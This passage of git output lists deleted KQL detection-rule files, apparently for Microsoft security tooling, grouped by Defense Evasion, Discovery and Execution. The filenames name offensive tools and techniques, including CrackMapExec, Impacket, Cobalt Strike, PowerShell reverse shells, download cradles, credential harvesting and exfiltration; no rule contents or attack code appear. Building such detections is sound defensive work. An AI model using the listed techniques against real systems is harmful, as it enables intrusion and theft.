100644 Defense Evasion/Wab_Execution_From_Non_Default_Location.kql delete mode 100644 Defense Evasion/Wdigest_CredGuard_Registry_Modification.kql delete mode 100644 Defense Evasion/Wdigest_Enable_UseLogonCredential.kql delete mode 100644 Defense Evasion/Weak_or_Abused_Passwords_In_CLI.kql delete mode 100644 Defense Evasion/Windows_Binaries_Write_Suspicious_Extensions.kql delete mode 100644 Defense Evasion/Windows_Defender_Definition_Files_Removed.kql delete mode 100644 Defense Evasion/Windows_Defender_Exclusions_Added_-_Registry.kql delete mode 100644 Defense Evasion/Windows_Defender_Service_Disabled_-_Registry.kql delete mode 100644 Defense Evasion/Windows_Firewall_Disabled_via_PowerShell.kql delete mode 100644 Defense Evasion/Windows_Kernel_Debugger_Execution.kql delete mode 100644 Defense Evasion/Windows_Processes_Suspicious_Parent_Directory.kql delete mode 100644 Defense Evasion/Windows_Spooler_Service_Suspicious_Binary_Load.kql delete mode 100644 Defense Evasion/Winget_Admin_Settings_Modification.kql delete mode 100644 Defense Evasion/Winlogon_AllowMultipleTSSessions_Enable.kql delete mode 100644 Defense Evasion/Wlrmdr.EXE_Uncommon_Argument_Or_Child_Process.kql delete mode 100644 Defense Evasion/Write_Protect_For_Storage_Disabled.kql delete mode 100644 Defense Evasion/Writing_Of_Malicious_Files_To_The_Fonts_Folder.kql delete mode 100644 Defense Evasion/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql delete mode 100644 Defense Evasion/XSL_Script_Execution_Via_WMIC.EXE.kql delete mode 100644 Defense Evasion/Xwizard.EXE_Execution_From_Non-Default_Location.kql delete mode 100644 Discovery/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql delete mode 100644 Discovery/Active_Directory_Structure_Export_Via_Csvde.EXE.kql delete mode 100644 Discovery/Advanced_IP_Scanner_-_File_Event.kql delete mode 100644 Discovery/BloodHound_Collection_Files.kql delete mode 100644 Discovery/Computer_Discovery_And_Export_Via_Get-ADComputer_Cmdlet.kql delete mode 100644 Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Discovery/Console_CodePage_Lookup_Via_CHCP.kql delete mode 100644 Discovery/Detected_Windows_Software_Discovery.kql delete mode 100644 Discovery/DirLister_Execution.kql delete mode 100644 Discovery/Discovery_of_a_System_Time.kql delete mode 100644 Discovery/Domain_Trust_Discovery_Via_Dsquery.kql delete mode 100644 Discovery/DriverQuery.EXE_Execution.kql delete mode 100644 Discovery/Enumerate_All_Information_With_Whoami.EXE.kql delete mode 100644 Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql delete mode 100644 Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql delete mode 100644 Discovery/Fsutil_Drive_Enumeration.kql delete mode 100644 Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql delete mode 100644 Discovery/Gpresult_Display_Group_Policy_Information.kql delete mode 100644 Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql delete mode 100644 Discovery/HackTool_-_Certify_Execution.kql delete mode 100644 Discovery/HackTool_-_Certipy_Execution.kql delete mode 100644 Discovery/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql delete mode 100644 Discovery/HackTool_-_SharpLdapWhoami_Execution.kql delete mode 100644 Discovery/HackTool_-_SharpView_Execution.kql delete mode 100644 Discovery/HackTool_-_TruffleSnout_Execution.kql delete mode 100644 Discovery/HackTool_-_WinPwn_Execution.kql delete mode 100644 Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql delete mode 100644 Discovery/Local_Accounts_Discovery.kql delete mode 100644 Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql delete mode 100644 Discovery/Network_Reconnaissance_Activity.kql delete mode 100644 Discovery/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql delete mode 100644 Discovery/Nltest.EXE_Execution.kql delete mode 100644 Discovery/Obfuscated_IP_Download_Activity.kql delete mode 100644 Discovery/Obfuscated_IP_Via_CLI.kql delete mode 100644 Discovery/PUA_-_AdFind_Suspicious_Execution.kql delete mode 100644 Discovery/PUA_-_Adidnsdump_Execution.kql delete mode 100644 Discovery/PUA_-_Advanced_IP_Scanner_Execution.kql delete mode 100644 Discovery/PUA_-_Advanced_Port_Scanner_Execution.kql delete mode 100644 Discovery/PUA_-_Crassus_Execution.kql delete mode 100644 Discovery/PUA_-_Seatbelt_Execution.kql delete mode 100644 Discovery/PUA_-_SoftPerfect_Netscan_Execution.kql delete mode 100644 Discovery/PUA_-_Suspicious_ActiveDirectory_Enumeration_Via_AdFind.EXE.kql delete mode 100644 Discovery/Permission_Check_Via_Accesschk.EXE.kql delete mode 100644 Discovery/Potential_Active_Directory_Enumeration_Using_AD_Module_-_ProcCreation.kql delete mode 100644 Discovery/Potential_Configuration_And_Service_Reconnaissance_Via_Reg.EXE.kql delete mode 100644 Discovery/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql delete mode 100644 Discovery/Potential_Network_Sniffing_Activity_Using_Network_Tools.kql delete mode 100644 Discovery/Potential_Recon_Activity_Using_DriverQuery.EXE.kql delete mode 100644 Discovery/Potential_Recon_Activity_Via_Nltest.EXE.kql delete mode 100644 Discovery/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql delete mode 100644 Discovery/Potential_Suspicious_Activity_Using_SeCEdit.kql delete mode 100644 Discovery/Potentially_Suspicious_EventLog_Recon_Activity_Using_Log_Query_Utilities.kql delete mode 100644 Discovery/Python_Initiated_Connection.kql delete mode 100644 Discovery/Recon_Command_Output_Piped_To_Findstr.EXE.kql delete mode 100644 Discovery/Renamed_Remote_Utilities_RAT_(RURAT)_Execution.kql delete mode 100644 Discovery/Renamed_Whoami_Execution.kql delete mode 100644 Discovery/Security_Privileges_Enumeration_Via_Whoami.EXE.kql delete mode 100644 Discovery/Security_Tools_Keyword_Lookup_Via_Findstr.EXE.kql delete mode 100644 Discovery/Share_And_Session_Enumeration_Using_Net.EXE.kql delete mode 100644 Discovery/Suspicious_Execution_of_Hostname.kql delete mode 100644 Discovery/Suspicious_Execution_of_Systeminfo.kql delete mode 100644 Discovery/Suspicious_Group_And_Account_Reconnaissance_Activity_Using_Net.EXE.kql delete mode 100644 Discovery/Suspicious_Kernel_Dump_Using_Dtrace.kql delete mode 100644 Discovery/Suspicious_Network_Command.kql delete mode 100644 Discovery/Suspicious_Network_Connection_to_IP_Lookup_Service_APIs.kql delete mode 100644 Discovery/Suspicious_Query_of_MachineGUID.kql delete mode 100644 Discovery/Suspicious_Reconnaissance_Activity_Using_Get-LocalGroupMember_Cmdlet.kql delete mode 100644 Discovery/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql delete mode 100644 Discovery/Suspicious_Scan_Loop_Network.kql delete mode 100644 Discovery/Suspicious_Use_of_PsLogList.kql delete mode 100644 Discovery/Suspicious_Where_Execution.kql delete mode 100644 Discovery/Sysinternals_PsService_Execution.kql delete mode 100644 Discovery/Sysinternals_PsSuspend_Execution.kql delete mode 100644 Discovery/Sysmon_Discovery_Via_Default_Driver_Altitude_Using_Findstr.EXE.kql delete mode 100644 Discovery/System_Disk_And_Volume_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Discovery/System_Network_Connections_Discovery_Via_Net.EXE.kql delete mode 100644 Discovery/Uncommon_System_Information_Discovery_Via_Wmic.EXE.kql delete mode 100644 Discovery/Use_of_W32tm_as_Timer.kql delete mode 100644 Discovery/User_Discovery_And_Export_Via_Get-ADUser_Cmdlet.kql delete mode 100644 Discovery/WhoAmI_as_Parameter.kql delete mode 100644 Discovery/Whoami.EXE_Execution_Anomaly.kql delete mode 100644 Discovery/Whoami.EXE_Execution_From_Privileged_Process.kql delete mode 100644 Discovery/Whoami.EXE_Execution_With_Output_Option.kql delete mode 100644 Discovery/Whoami_Utility_Execution.kql delete mode 100644 Execution/AADInternals_PowerShell_Cmdlets_Execution_-_ProccessCreation.kql delete mode 100644 Execution/Abusable_DLL_Potential_Sideloading_From_Suspicious_Location.kql delete mode 100644 Execution/Active_Directory_Kerberos_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Execution/Active_Directory_Parsing_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Execution/Add_Insecure_Download_Source_To_Winget.kql delete mode 100644 Execution/Add_New_Download_Source_To_Winget.kql delete mode 100644 Execution/Add_Potential_Suspicious_New_Download_Source_To_Winget.kql delete mode 100644 Execution/Add_Windows_Capability_Via_PowerShell_Cmdlet.kql delete mode 100644 Execution/Application_Removed_Via_Wmic.EXE.kql delete mode 100644 Execution/Application_Terminated_Via_Wmic.EXE.kql delete mode 100644 Execution/Arbitrary_Binary_Execution_Using_GUP_Utility.kql delete mode 100644 Execution/Arbitrary_Command_Execution_Using_WSL.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_IMEWDBLD.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_MSEDGE_PROXY.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_MSOHTMED.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_MSPUB.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_PresentationHost.EXE.kql delete mode 100644 Execution/Arbitrary_File_Download_Via_Squirrel.EXE.kql delete mode 100644 Execution/Arbitrary_MSI_Download_Via_Devinit.EXE.kql delete mode 100644 Execution/Arbitrary_Shell_Command_Execution_Via_Settingcontent-Ms.kql delete mode 100644 Execution/Assembly_DLL_Creation_Via_AspNetCompiler.kql delete mode 100644 Execution/Base64_MZ_Header_In_CommandLine.kql delete mode 100644 Execution/Binary_Proxy_Execution_Via_Dotnet-Trace.EXE.kql delete mode 100644 Execution/BloodHound_Collection_Files.kql delete mode 100644 Execution/Blue_Mockingbird_-_Registry.kql delete mode 100644 Execution/CLR_DLL_Loaded_Via_Office_Applications.kql delete mode 100644 Execution/CMSTP_Execution_Process_Creation.kql delete mode 100644 Execution/CMSTP_Execution_Registry_Event.kql delete mode 100644 Execution/CMSTP_UAC_Bypass_via_COM_Object_Access.kql delete mode 100644 Execution/CSExec_Service_File_Creation.kql delete mode 100644 Execution/Certificate_Exported_Via_PowerShell.kql delete mode 100644 Execution/Change_PowerShell_Policies_to_an_Insecure_Level.kql delete mode 100644 Execution/Chromium_Browser_Headless_Execution_To_Mockbin_Like_Site.kql delete mode 100644 Execution/Cmd.EXE_Missing_Space_Characters_Execution_Anomaly.kql delete mode 100644 Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql delete mode 100644 Execution/Computer_Password_Change_Via_Ksetup.EXE.kql delete mode 100644 Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Conhost.exe_CommandLine_Path_Traversal.kql delete mode 100644 Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql delete mode 100644 Execution/Control_Panel_Items.kql delete mode 100644 Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql delete mode 100644 Execution/Created_Files_by_Microsoft_Sync_Center.kql delete mode 100644 Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql delete mode 100644 Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql delete mode 100644 Execution/DLL_Load_via_LSASS.kql delete mode 100644 Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql delete mode 100644 Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql delete mode 100644 Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql delete mode 100644 Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql delete mode 100644 Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql delete mode 100644 Execution/Exchange_PowerShell_Snap-Ins_Usage.kql delete mode 100644 Execution/Execute_Code_with_Pester.bat.kql delete mode 100644 Execution/Execute_Code_with_Pester.bat_as_Parent.kql delete mode 100644 Execution/Execute_MSDT_Via_Answer_File.kql delete mode 100644 Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql delete mode 100644 Execution/Execution_of_Powershell_Script_in_Public_Folder.kql delete mode 100644 Execution/File_Decryption_Using_Gpg4win.kql delete mode 100644 Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql delete mode 100644 Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql delete mode 100644 Execution/File_Encryption_Using_Gpg4win.kql delete mode 100644 Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql delete mode 100644 Execution/Forfiles_Command_Execution.kql delete mode 100644 Execution/Fsutil_Behavior_Set_SymlinkEvaluation.kql delete mode 100644 Execution/GAC_DLL_Loaded_Via_Office_Applications.kql delete mode 100644 Execution/HTML_Help_HH.EXE_Suspicious_Child_Process.kql delete mode 100644 Execution/HackTool_-_Covenant_PowerShell_Launcher.kql delete mode 100644 Execution/HackTool_-_CrackMapExec_Execution.kql delete mode 100644 Execution/HackTool_-_CrackMapExec_Execution_Patterns.kql delete mode 100644 Execution/HackTool_-_CrackMapExec_PowerShell_Obfuscation.kql delete mode 100644 Execution/HackTool_-_Empire_PowerShell_Launch_Parameters.kql delete mode 100644 Execution/HackTool_-_Impacket_Tools_Execution.kql delete mode 100644 Execution/HackTool_-_Jlaive_In-Memory_Assembly_Execution.kql delete mode 100644 Execution/HackTool_-_Koadic_Execution.kql delete mode 100644 Execution/HackTool_-_Potential_Impacket_Lateral_Movement_Activity.kql delete mode 100644 Execution/HackTool_-_RedMimicry_Winnti_Playbook_Execution.kql delete mode 100644 Execution/HackTool_-_Sliver_C2_Implant_Activity_Pattern.kql delete mode 100644 Execution/HackTool_-_Stracciatella_Execution.kql delete mode 100644 Execution/HackTool_-_WinPwn_Execution.kql delete mode 100644 Execution/Hardware_Model_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Hidden_Powershell_in_Link_File_Pattern.kql delete mode 100644 Execution/IE_ZoneMap_Setting_Downgraded_To_MyComputer_Zone_For_HTTP_Protocols_Via_CLI.kql delete mode 100644 Execution/Import_PowerShell_Modules_From_Suspicious_Directories_-_ProcCreation.kql delete mode 100644 Execution/Indirect_Command_Execution_By_Program_Compatibility_Wizard.kql delete mode 100644 Execution/Insecure_Transfer_Via_Curl.EXE.kql delete mode 100644 Execution/Install_New_Package_Via_Winget_Local_Manifest.kql delete mode 100644 Execution/Invoke-Obfuscation_CLIP+_Launcher.kql delete mode 100644 Execution/Invoke-Obfuscation_COMPRESS_OBFUSCATION.kql delete mode 100644 Execution/Invoke-Obfuscation_Obfuscated_IEX_Invocation.kql delete mode 100644 Execution/Invoke-Obfuscation_STDIN+_Launcher.kql delete mode 100644 Execution/Invoke-Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql delete mode 100644 Execution/Invoke-Obfuscation_VAR+_Launcher.kql delete mode 100644 Execution/Invoke-Obfuscation_Via_Stdin.kql delete mode 100644 Execution/Invoke-Obfuscation_Via_Use_Clip.kql delete mode 100644 Execution/Invoke-Obfuscation_Via_Use_MSHTA.kql delete mode 100644 Execution/Java_Running_with_Remote_Debugging.kql delete mode 100644 Execution/Local_File_Read_Using_Curl.EXE.kql delete mode 100644 Execution/Logged-On_User_Password_Change_Via_Ksetup.EXE.kql delete mode 100644 Execution/MMC20_Lateral_Movement.kql delete mode 100644 Execution/MSHTA_Suspicious_Execution_01.kql delete mode 100644 Execution/Malicious_Base64_Encoded_PowerShell_Keywords_in_Command_Lines.kql delete mode 100644 Execution/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql delete mode 100644 Execution/Malicious_PowerShell_Scripts_-_FileCreation.kql delete mode 100644 Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql delete mode 100644 Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql delete mode 100644 Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql delete mode 100644 Execution/Microsoft_Workflow_Compiler_Execution.kql delete mode 100644 Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql delete mode 100644 Execution/Net_WebClient_Casing_Anomalies.kql delete mode 100644 Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql delete mode 100644 Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql delete mode 100644 Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql delete mode 100644 Execution/New_Application_in_AppCompat.kql delete mode 100644 Execution/New_Process_Created_Via_Wmic.EXE.kql delete mode 100644 Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql delete mode 100644 Execution/Non_Interactive_PowerShell_Process_Spawned.kql delete mode 100644 Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql delete mode 100644 Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql delete mode 100644 Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql delete mode 100644 Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql delete mode 100644 Execution/Outbound_Network_Connection_To_Public_IP_Via_Winlogon.kql delete mode 100644 Execution/Outlook_EnableUnsafeClientMailRules_Setting_Enabled.kql delete mode 100644 Execution/PCRE.NET_Package_Image_Load.kql delete mode 100644 Execution/PCRE.NET_Package_Temp_Files.kql delete mode 100644 Execution/PDQ_Deploy_Remote_Adminstartion_Tool_Execution.kql delete mode 100644 Execution/PSEXEC_Remote_Execution_File_Artefact.kql delete mode 100644 Execution/PUA_-_AdvancedRun_Execution.kql delete mode 100644 Execution/PUA_-_CsExec_Execution.kql delete mode 100644 Execution/PUA_-_NSudo_Execution.kql delete mode 100644 Execution/PUA_-_NirCmd_Execution.kql delete mode 100644 Execution/PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql delete mode 100644 Execution/PUA_-_Radmin_Viewer_Utility_Execution.kql delete mode 100644 Execution/PUA_-_RunXCmd_Execution.kql delete mode 100644 Execution/PUA_-_Wsudo_Suspicious_Execution.kql delete mode 100644 Execution/Parent_in_Public_Folder_Suspicious_Process.kql delete mode 100644 Execution/Perl_Inline_Command_Execution.kql delete mode 100644 Execution/Php_Inline_Command_Execution.kql delete mode 100644 Execution/Potential_Adplus.EXE_Abuse.kql delete mode 100644 Execution/Potential_Arbitrary_Command_Execution_Via_FTP.EXE.kql delete mode 100644 Execution/Potential_Arbitrary_File_Download_Via_Cmdl32.EXE.kql delete mode 100644 Execution/Potential_Binary_Impersonating_Sysinternals_Tools.kql delete mode 100644 Execution/Potential_Binary_Proxy_Execution_Via_Cdb.EXE.kql delete mode 100644 Execution/Potential_CobaltStrike_Process_Patterns.kql delete mode 100644 Execution/Potential_CobaltStrike_Service_Installations_-_Registry.kql delete mode 100644 Execution/Potential_CommandLine_Path_Traversal_Via_Cmd.EXE.kql delete mode 100644 Execution/Potential_Cookies_Session_Hijacking.kql delete mode 100644 Execution/Potential_DLL_File_Download_Via_PowerShell_Invoke-WebRequest.kql delete mode 100644 Execution/Potential_Data_Exfiltration_Activity_Via_CommandLine_Tools.kql delete mode 100644 Execution/Potential_Discovery_Activity_Via_Dnscmd.EXE.kql delete mode 100644 Execution/Potential_Dosfuscation_Activity.kql delete mode 100644 Execution/Potential_Encoded_PowerShell_Patterns_In_CommandLine.kql delete mode 100644 Execution/Potential_File_Download_Via_MS-AppInstaller_Protocol_Handler.kql delete mode 100644 Execution/Potential_Persistence_Via_Powershell_Search_Order_Hijacking_-_Task.kql delete mode 100644 Execution/Potential_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql delete mode 100644 Execution/Potential_PowerShell_Command_Line_Obfuscation.kql delete mode 100644 Execution/Potential_PowerShell_Downgrade_Attack.kql delete mode 100644 Execution/Potential_PowerShell_Obfuscation_Via_Reversed_Commands.kql delete mode 100644 Execution/Potential_PowerShell_Obfuscation_Via_WCHAR.kql delete mode 100644 Execution/Potential_Powershell_ReverseShell_Connection.kql delete mode 100644 Execution/Potential_Product_Class_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Potential_Product_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Potential_RDP_Session_Hijacking_Activity.kql delete mode 100644 Execution/Potential_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql delete mode 100644 Execution/Potential_ReflectDebugger_Content_Execution_Via_WerFault.EXE.kql delete mode 100644 Execution/Potential_Renamed_Rundll32_Execution.kql delete mode 100644 Execution/Potential_SMB_Relay_Attack_Tool_Execution.kql delete mode 100644 Execution/Potential_ShellDispatch.DLL_Functionality_Abuse.kql delete mode 100644 Execution/Potential_Suspicious_Browser_Launch_From_Document_Reader_Process.kql delete mode 100644 Execution/Potential_Unquoted_Service_Path_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Potential_Ursnif_Malware_Activity_-_Registry.kql delete mode 100644 Execution/Potential_WMI_Lateral_Movement_WmiPrvSE_Spawned_PowerShell.kql delete mode 100644 Execution/Potential_WinAPI_Calls_Via_CommandLine.kql delete mode 100644 Execution/Potentially_Suspicious_Child_Process_Of_ClickOnce_Application.kql delete mode 100644 Execution/Potentially_Suspicious_Child_Process_Of_VsCode.kql delete mode 100644 Execution/Potentially_Suspicious_Child_Process_Of_WinRAR.EXE.kql delete mode 100644 Execution/Potentially_Suspicious_Child_Process_of_KeyScrambler.exe.kql delete mode 100644 Execution/Potentially_Suspicious_Electron_Application_CommandLine.kql delete mode 100644 Execution/Potentially_Suspicious_Execution_Of_PDQDeployRunner.kql delete mode 100644 Execution/Potentially_Suspicious_File_Download_From_File_Sharing_Domain_Via_PowerShell.EXE.kql delete mode 100644 Execution/Potentially_Suspicious_PowerShell_Child_Processes.kql delete mode 100644 Execution/Potentially_Suspicious_WebDAV_LNK_Execution.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_FromBase64String_Cmdlet.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_IEX_Cmdlet.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_Invoke_Keyword.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_Reflective_Assembly_Load.kql delete mode 100644 Execution/PowerShell_Base64_Encoded_WMI_Classes.kql delete mode 100644 Execution/PowerShell_Core_DLL_Loaded_By_Non_PowerShell_Process.kql delete mode 100644 Execution/PowerShell_DownloadFile.kql delete mode 100644 Execution/PowerShell_Download_Pattern.kql delete mode 100644 Execution/PowerShell_Download_and_Execution_Cradles.kql delete mode 100644 Execution/PowerShell_Execution_With_Potential_Decryption_Capabilities.kql delete mode 100644 Execution/PowerShell_Script_Execution_Policy_Enabled.kql delete mode 100644 Execution/PowerShell_Script_Run_in_AppData.kql delete mode 100644 Execution/PowerShell_Web_Download.kql delete mode 100644 Execution/PowerShell_as_a_Service_in_Registry.kql delete mode 100644 Execution/Powershell_Inline_Execution_From_A_File.kql delete mode 100644 Execution/PrinterNightmare_Mimikatz_Driver_Name.kql delete mode 100644 Execution/Process_Proxy_Execution_Via_Squirrel.EXE.kql delete mode 100644 Execution/Process_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Proxy_Execution_Via_Wuauclt.EXE.kql delete mode 100644 Execution/PsExec_Service_Child_Process_Execution_as_LOCAL_SYSTEM.kql delete mode 100644 Execution/PsExec_Service_Execution.kql delete mode 100644 Execution/PsExec_Service_File_Creation.kql delete mode 100644 Execution/Psexec_Execution.kql delete mode 100644 Execution/Python_Inline_Command_Execution.kql delete mode 100644 Execution/Python_Spawning_Pretty_TTY_on_Windows.kql delete mode 100644 Execution/Query_Usage_To_Exfil_Data.kql delete mode 100644 Execution/Read_Contents_From_Stdin_Via_Cmd.EXE.kql delete mode 100644 Execution/Rebuild_Performance_Counter_Values_Via_Lodctr.EXE.kql delete mode 100644 Execution/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql delete mode 100644 Execution/RemCom_Service_File_Creation.kql delete mode 100644 Execution/Remote_Access_Tool_-_AnyDesk_Execution_With_Known_Revoked_Signing_Certificate.kql delete mode 100644 Execution/Remote_Access_Tool_-_ScreenConnect_Remote_Command_Execution.kql delete mode 100644 Execution/Remote_Access_Tool_-_ScreenConnect_Temporary_File.kql delete mode 100644 Execution/Remote_DLL_Load_Via_Rundll32.EXE.kql delete mode 100644 Execution/Remote_PowerShell_Session_Host_Process_(WinRM).kql delete mode 100644 Execution/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql delete mode 100644 Execution/Renamed_CURL.EXE_Execution.kql delete mode 100644 Execution/Renamed_FTP.EXE_Execution.kql delete mode 100644 Execution/Renamed_Jusched.EXE_Execution.kql delete mode 100644 Execution/Renamed_NirCmd.EXE_Execution.kql delete mode 100644 Execution/Renamed_PingCastle_Binary_Execution.kql delete mode 100644 Execution/Renamed_PsExec_Service_Execution.kql delete mode 100644 Execution/Ruby_Inline_Command_Execution.kql delete mode 100644 Execution/Run_PowerShell_Script_from_Redirected_Input_Stream.kql delete mode 100644 Execution/Rundll32_Execution_Without_Parameters.kql delete mode 100644 Execution/Rundll32_Internet_Connection.kql delete mode 100644 Execution/Rundll32_UNC_Path_Execution.kql delete mode 100644 Execution/SQL_Client_Tools_PowerShell_Session_Detection.kql delete mode 100644 Execution/Scheduled_Task_Creation_Via_Schtasks.EXE.kql delete mode 100644 Execution/Scheduled_Task_Executing_Encoded_Payload_from_Registry.kql delete mode 100644 Execution/Scheduled_Task_Executing_Payload_from_Registry.kql delete mode 100644 Execution/Schtasks_Creation_Or_Modification_With_SYSTEM_Privileges.kql delete mode 100644 Execution/Schtasks_From_Suspicious_Folders.kql delete mode 100644 Execution/Script_Event_Consumer_Spawning_Process.kql delete mode 100644 Execution/Script_Interpreter_Execution_From_Suspicious_Folder.kql delete mode 100644 Execution/Service_Reconnaissance_Via_Wmic.EXE.kql delete mode 100644 Execution/Service_StartupType_Change_Via_PowerShell_Set-Service.kql delete mode 100644 Execution/Service_StartupType_Change_Via_Sc.EXE.kql delete mode 100644 Execution/Shell32_DLL_Execution_in_Suspicious_Directory.kql delete mode 100644 Execution/Start_Windows_Service_Via_Net.EXE.kql delete mode 100644 Execution/Suspicious_Binary_In_User_Directory_Spawned_From_Office_Application.kql delete mode 100644 Execution/Suspicious_Child_Process_Of_BgInfo.EXE.kql delete mode 100644 Execution/Suspicious_Command_Patterns_In_Scheduled_Task_Creation.kql delete mode 100644 Execution/Suspicious_Csi.exe_Usage.kql delete mode 100644 Execution/Suspicious_Electron_Application_Child_Processes.kql delete mode 100644 Execution/Suspicious_Encoded_And_Obfuscated_Reflection_Assembly_Load_Function_Call.kql delete mode 100644 Execution/Suspicious_Encoded_PowerShell_Command_Line.kql delete mode 100644 Execution/Suspicious_Execution_Location_Of_Wermgr.EXE.kql delete mode 100644 Execution/Suspicious_Execution_of_Powershell_with_Base64.kql delete mode 100644 Execution/Suspicious_File_Characteristics_Due_to_Missing_Fields.kql delete mode 100644 Execution/Suspicious_File_Created_In_PerfLogs.kql delete mode 100644 Execution/Suspicious_File_Creation_In_Uncommon_AppData_Folder.kql delete mode 100644 Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Curl.EXE.kql delete mode 100644 Execution/Suspicious_File_Download_From_File_Sharing_Domain_Via_Wget.EXE.kql delete mode 100644 Execution/Suspicious_File_Download_From_IP_Via_Curl.EXE.kql delete mode 100644 Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE.kql delete mode 100644 Execution/Suspicious_File_Download_From_IP_Via_Wget.EXE_-_Paths.kql delete mode 100644 Execution/Suspicious_File_Execution_From_Internet_Hosted_WebDav_Share.kql delete mode 100644 Execution/Suspicious_Greedy_Compression_Using_Rar.EXE.kql delete mode 100644 Execution/Suspicious_HH.EXE_Execution.kql delete mode 100644 Execution/Suspicious_HWP_Sub_Processes.kql delete mode 100644 Execution/Suspicious_Interactive_PowerShell_as_SYSTEM.kql delete mode 100644 Execution/Suspicious_LOLBIN_AccCheckConsole.kql delete mode 100644 Execution/Suspicious_Microsoft_Office_Child_Process.kql delete mode 100644 Execution/Suspicious_Modification_Of_Scheduled_Tasks.kql delete mode 100644 Execution/Suspicious_Mshta.EXE_Execution_Patterns.kql delete mode 100644 Execution/Suspicious_Outlook_Child_Process.kql delete mode 100644 Execution/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql delete mode 100644 Execution/Suspicious_PowerShell_Download_and_Execute_Pattern.kql delete mode 100644 Execution/Suspicious_PowerShell_Encoded_Command_Patterns.kql delete mode 100644 Execution/Suspicious_PowerShell_IEX_Execution_Patterns.kql delete mode 100644 Execution/Suspicious_PowerShell_Parameter_Substring.kql delete mode 100644 Execution/Suspicious_PowerShell_Parent_Process.kql delete mode 100644 Execution/Suspicious_Process_Created_Via_Wmic.EXE.kql delete mode 100644 Execution/Suspicious_Program_Names.kql delete mode 100644 Execution/Suspicious_RASdial_Activity.kql delete mode 100644 Execution/Suspicious_Reconnaissance_Activity_Via_GatherNetworkInfo.VBS.kql delete mode 100644 Execution/Suspicious_Remote_Child_Process_From_Outlook.kql delete mode 100644 Execution/Suspicious_Runscripthelper.exe.kql delete mode 100644 Execution/Suspicious_Scan_Loop_Network.kql delete mode 100644 Execution/Suspicious_Scheduled_Task_Creation_Involving_Temp_Folder.kql delete mode 100644 Execution/Suspicious_Scheduled_Task_Name_As_GUID.kql delete mode 100644 Execution/Suspicious_Scheduled_Task_Write_to_System32_Tasks.kql delete mode 100644 Execution/Suspicious_Schtasks_Execution_AppData_Folder.kql delete mode 100644 Execution/Suspicious_Schtasks_From_Env_Var_Folder.kql delete mode 100644 Execution/Suspicious_Schtasks_Schedule_Type_With_High_Privileges.kql delete mode 100644 